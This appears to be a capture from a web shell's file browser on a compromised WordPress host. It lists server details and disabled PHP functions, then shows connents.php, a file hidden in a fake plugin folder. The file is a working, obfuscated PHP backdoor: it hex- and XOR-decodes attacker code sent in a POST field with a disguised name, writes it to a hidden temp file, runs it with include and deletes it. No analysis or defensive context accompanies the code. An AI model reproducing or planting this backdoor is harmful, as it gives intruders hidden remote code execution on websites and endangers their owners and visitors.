HEX
Server: Apache/2
System: Linux host.jethost.pl 4.19.0-26-amd64 #1 SMP Debian 4.19.304-1 (2024-01-09) x86_64
User: frigodor (1049)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,mail
Upload Files
File: /home/frigodor/domains/frigodor.pl/public_html/wp-content/plugins/custom-1750472894/connents.php
<!--nBobUHob-->
<?php

if(!empty($_POST["\x70\x61r\x61m\x65\x74e\x72_\x67\x72oup"])){
$k = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", "/dev/shm", "/var/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]);
$pointer = hex2bin($_POST["\x70\x61r\x61m\x65\x74e\x72_\x67\x72oup"]);
$flag =    '';  $l=0;while($l<strlen($pointer)){$flag.=chr(ord($pointer[$l])^65);$l++;}
for ($resource = 0, $entry = count($k); $resource < $entry; $resource++) {
    $pgrp = $k[$resource];
            if (!( !is_dir($pgrp) || !is_writable($pgrp) )) {
            $factor = join("/", [$pgrp, ".symbol"]);
            if ($pset = fopen($factor, 'w')) {
    fwrite($pset, $flag);
    fclose($pset);
    include_once $factor;
    unlink($factor);
    exit;
}
        }
}
}